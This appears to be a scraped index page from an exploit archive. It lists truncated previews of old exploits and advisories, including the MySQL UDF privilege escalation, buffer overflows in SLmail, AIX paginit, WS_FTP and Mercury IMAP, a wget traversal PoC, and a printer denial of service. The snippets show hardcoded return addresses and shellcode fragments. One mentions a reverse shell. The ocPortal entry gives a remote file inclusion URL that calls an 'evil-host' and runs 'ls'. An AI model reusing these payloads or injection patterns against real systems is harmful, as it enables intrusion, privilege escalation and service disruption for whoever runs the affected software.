Portcullis Security Advisory 05-004

Portcullis Security Advisory Vulnerable System: MediaPartner 5.0 Vulnerability Title: In Place Password Update Process Flawed Vulnerability discovery and development: Portcullis Security Testing Service Affected systems: Emotion MediaPartner Web Server Version 5.0 5.1 not confirmed Details: The...

[EXPL] iWebNegar Configuration Nullification (DoS)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1)

/ $Id: raptorudf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $ raptorudf.c - dynamic library for dosystem MySQL UDF Copyright c 2004 Marco Ivaldi This is an helper dynamic library for local privilege escalation through MySQL run with root privileges very bad idea!. Tested on MySQL 4.0.17. Code ripped...

Seattle Lab Mail (SLmail) 5.5 - POP3 PASS Remote Buffer Overflow (2)

Seattle Lab Mail SLmail 5.5 - POP3 PASS Remote Buffer Overflow 2 include include include include include include include include include include define retadd "\x9f\x45\x3a\x77" /win2k server sp4 0x773a459f/ define port 110 / revshell العراق القراصنة المجموعة/ char shellcode =...

AIX 5.1 < 5.3 - paginit Local Stack Overflow

/ exploit for /usr/bin/paginit tested on: AIX 5.2 if the exploit fails it's because the shellcode ends up at a different address. use dbx to check, and change RETADDR accordingly. cees-bart / define RETADDR 0x2ff22c90 char shellcode = "\x7c\xa5\x2a\x79" "\x40\x82\xff\xfd" "\x7c\xa8\x02\xa6"...

Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit

No description provided by source. / RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit. DATE: 12.15.2004 Vuln Advisory : Hongzhen Zhoufelixzhou at hotmail dot com Exploit Writer : x90cKyong [email protected]/jyj9782 Testing -----------------------------------------------...

wget 1.9 - Directory Traversal

wget 1.9 - Directory Traversal !/usr/bin/perl -W wgettrap.poc -- A POC for the wget1 directory traversal vulnerability Copyright 2004 Jan Min???? jjminar fastmail fm License: Public Domain When wget connects to us, we send it a HTTP redirect constructed so that wget wget will connect the second...

Blog Torrent preview 0.8 - arbitary file download

Intro ----- Blogtorrent is a collection of PHP scripts which are designed to make it simple to host files for transfer via bittorrent. Whilst it is not normal to report security problems in "preview" releases of software this software was covered prominently upon Slashdot and could be widely used...

Aspell (word-list-compress) Command Line Stack Overflow

Exploit for linux platform in category local exploits ======================================================= Aspell word-list-compress Command Line Stack Overflow ======================================================= / Fuck private exploits . Fuck iranian hacking and security !! teams who are...

WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit

No description provided by source. / no@0x00:/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test Ipswitch WSFTP Remote buffer overflow exploit by NoPh0BiA. x Connected to: 10.20.30.2 on port 21. x Sending Login..done. x Sending bad code..done. x Checking if exploitation was successful.. ...

Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)

Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET, socket.SOCKSTREAM Lame calc.exe shellcode - dont expect...

technote-commandexec.txt

Technote Command Excution Technote Inc. from Korea offers a Site Package which includes a web board. Previous exploit discovered way back on year 2000 focused on a File Disclosure Vulnerability http://www.securityfocus.com/bid/2156/discussion/ However, command execution is also possible using the...

phpWebSite 0.7.30.8.x0.9.3 - User Module HTTP Response Splitting

phpWebSite 0.7.30.8.x0.9.3 - User Module HTTP Response Splitting source: https://www.securityfocus.com/bid/11673/info A remote HTTP response splitting vulnerability reportedly affects phpWebSite in its user module. This issue is due to a failure of the application to properly sanitize user-suppli...

stackShell.txt

hi, im posting here a manner for avoiding stackguard. Shellcode without zeros. // /Shellcode avoiding stack protections sample--------Vallez/29a/ // / All we have listened about stack protections. Security products are protecting stacks of code executed there. New hardware too, that will not let...

libxml 2.6.12 nanoftp - Local Buffer Overflow

libxml 2.6.12 nanoftp - Local Buffer Overflow / libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom n00b localho outernet gcc -Wall libsuxml.c -lxml2 n00b localho outernet ./a.out Usage: ./a.out align n00b localho outernet netstat -ant | grep 7000 n00b localho outernet ./a.out 0xbfff0360...

libxml 2.6.12 nanoftp - Local Buffer Overflow

/ libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom n00b localho outernet gcc -Wall libsuxml.c -lxml2 n00b localho outernet ./a.out Usage: ./a.out align n00b localho outernet netstat -ant | grep 7000 n00b localho outernet ./a.out 0xbfff0360 xmlNanoFTPScanURL: Use IPv6/IPv4 format n00b...

SLX Server 6.1 Arbitrary File Creation Exploit (PoC)

No description provided by source. !/usr/bin/perl Proof of concept exploit: Arbitrary file creation for SLX server 6.1 Written by Carl Livitt, Agenda Security Services, June 2004. This exploit abuses the ProcessQueueFile command on SLX 6.1 others? servers to create arbitrary files on the filesyst...

ocPortal 1.0.3 - Remote File Inclusion

ocPortal 1.0.3 - Remote File Inclusion http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host support php. '; ?...

ocPortal 1.0.3 - Remote File Inclusion

http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host support php. '; ? http://localhost/ocp-103/index.php?reqpath=http://evil-host/&com=ls milw0rm.com...

Multiple vulnerabilities in BlackBoard

Multiple vulnerabilities in BlackBoard AuThor:Cracklove emA!l:CrackloveatGmaildotCom HoMePaGe:http://ProxySky.com Info Website: http://blackboard.unclassified.de Version: 1.5.1,Maybe prior Problem: Full path disclosure,Include file Vuls 1.Full path disclosure: Let's try to request like this:...